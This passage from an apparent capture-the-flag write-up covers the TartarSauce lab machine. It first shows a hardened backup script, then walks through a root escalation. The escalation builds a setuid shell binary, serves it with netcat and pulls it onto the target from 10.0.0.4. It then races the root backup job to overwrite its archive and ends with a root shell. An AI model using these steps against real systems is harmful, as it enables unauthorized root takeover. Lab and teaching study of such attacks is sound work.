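    tar -C "$(dirname "$src")" -zcf "$archive" "$(basename "$src")"
    expected=$(sha256_of "$archive")

    # The original script sleeps 30s here; with the hash pinned, any window
    # between creation and extraction no longer lets a replacement slip in.
    actual=$(sha256_of "$archive")
    if [ "$expected" != "$actual" ]; then
        echo "archive changed on disk, refusing to extract" >&2
        rm -rf "$work"; return 2
    fi
    if archive_has_setuid "$archive"; then
        echo "archive contains setuid/setgid members, refusing to extract" >&2
        rm -rf "$work"; return 3
    fi

    mkdir "$check"
    tar -zxf "$archive" -C "$check" --no-same-owner --no-same-permissions
    if ! diff -r "$src" "$check/$(basename "$src")" >/dev/null; then
        echo "integrity check failed" >&2
        rm -rf "$work"; return 4
    fi
    mv "$archive" "$dest"
    rm -rf "$work"
}

# Stand-alone demo on a constructed web root (no root privileges needed).
demo=$(mktemp -d)
mkdir -p "$demo/html"
echo '<h1>dev site</h1>' > "$demo/html/index.html"
safe_backup "$demo/html" "$demo/onuma-www-dev.bak" && echo "backup written to $demo/onuma-www-dev.bak"
```

The decisive change is that the file root extracts is never exposed to another user between creation and extraction; the hash check and the setuid refusal are belt-and-braces for the case where the work directory is ever moved somewhere shared again.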

Privesc to Root

So let's see how we put it all together…

Seeing as the target is 32-bit Ubuntu, let's start by creating a setuid binary for a 32-bit arch in the right directory structure, and use tar to create an archive.


[email protected]:~/TartarSauce# cat privesc.c 
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    clearenv();
    system("/usr/bin/python -c 'import pty; pty.spawn(\"/bin/bash\")'");
    return 0;
}
[email protected]:~/TartarSauce# mkdir -p var/www/html
[email protected]:~/TartarSauce# gcc -m32 privesc.c -o var/www/html/pwnd 2>/dev/null
[email protected]:~/TartarSauce# chmod 6005 var/www/html/pwnd
[email protected]:~/TartarSauce# ls -al  var/www/html/pwnd
---S--Sr-x 1 root root 7332 Mar  8 18:15 var/www/html/pwnd
[email protected]:~/TartarSauce# tar -zcvf pwnd.tar.gz var/www/html
var/www/html/
var/www/html/pwnd
[email protected]:~/TartarSauce# ls -al  pwnd.tar.gz 
-rw-r--r-- 1 root root 2677 Mar  8 18:26 pwnd.tar.gz

Now we just need to wait for the moment when the /var/tmp/[random sha1] file appears, then overwrite it.

So let's use netcat to serve the pwnd.tar.gz file we just created.


[email protected]:~/TartarSauce# nc -nvlp 666 < pwnd.tar.gz 
listening on [any] 666 ...


In another terminal, we open a second session and watch for the backup script to run.


[email protected]:/var/tmp$ watch -n 0.3 'ls -al |grep -v private'

total 40
drwxrwxrwt  9 root  root  4096 Mar  7 19:50 .
drwxr-xr-x 14 root  root  4096 Feb  9 08:59 ..
-rw-r--r--  1 onuma onuma 2625 Mar  7 19:50 .d12c93aba812092239d525c7861935c2baf46da5

Quickly, we pull the replacement file via nc and overwrite the contents of .d12c93aba812092239d525c7861935c2baf46da5.


[email protected]:/var/tmp$ nc 10.0.0.4 666 > .d12c93aba812092239d525c7861935c2baf46da5

Then we wait for the script to extract it with root privileges, and execute the setuid pwnd binary.


[email protected]:/var/tmp$ ls -al 
ls -al 
total 40
drwxrwxrwt  9 root  root  4096 Mar  8 13:28 .
drwxr-xr-x 14 root  root  4096 Feb  9 08:59 ..
-rw-r--r--  1 onuma onuma 2677 Mar  8 13:28 .d12c93aba812092239d525c7861935c2baf46da5
drwxr-xr-x  3 root  root  4096 Mar  8 13:28 check

[email protected]:/var/tmp$ check/var/www/html/pwnd
check/var/www/html/pwnd
[email protected]:/var/tmp# id
id
uid=0(root) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
[email protected]:/var/tmp# 

So now we have root and can read root.txt to prove it.


[email protected]:/var/tmp# cd /root
cd /root
[email protected]:/root# ls -al  
ls -al  
total 820
drwx------  4 root root    4096 Feb 21 16:50 .
drwxr-xr-x 22 root root    4096 Feb 15 17:21 ..
-rw-------  1 root onuma   3024 Mar  6 15:50 .bash_history
drwx------  2 root root    4096 Feb 17 17:23 .cache
-rw-------  1 root root     118 Feb 21 16:50 .mysql_history
drwxr-xr-x  2 root root    4096 Feb 21 13:06 .nano
-rw-r--r--  1 root root     170 Feb 21 08:15 .wget-hsts
-rw-------  1 root root      33 Feb  9 09:56 root.txt
-rw-r--r--  1 root root  282407 Feb 21 16:48 sys.sql
-rw-r--r--  1 root root  522163 Feb 21 16:48 wp.sql
[email protected]:/root# cat root.txt
cat root.txt
e79a...
[email protected]:/root# 

The End…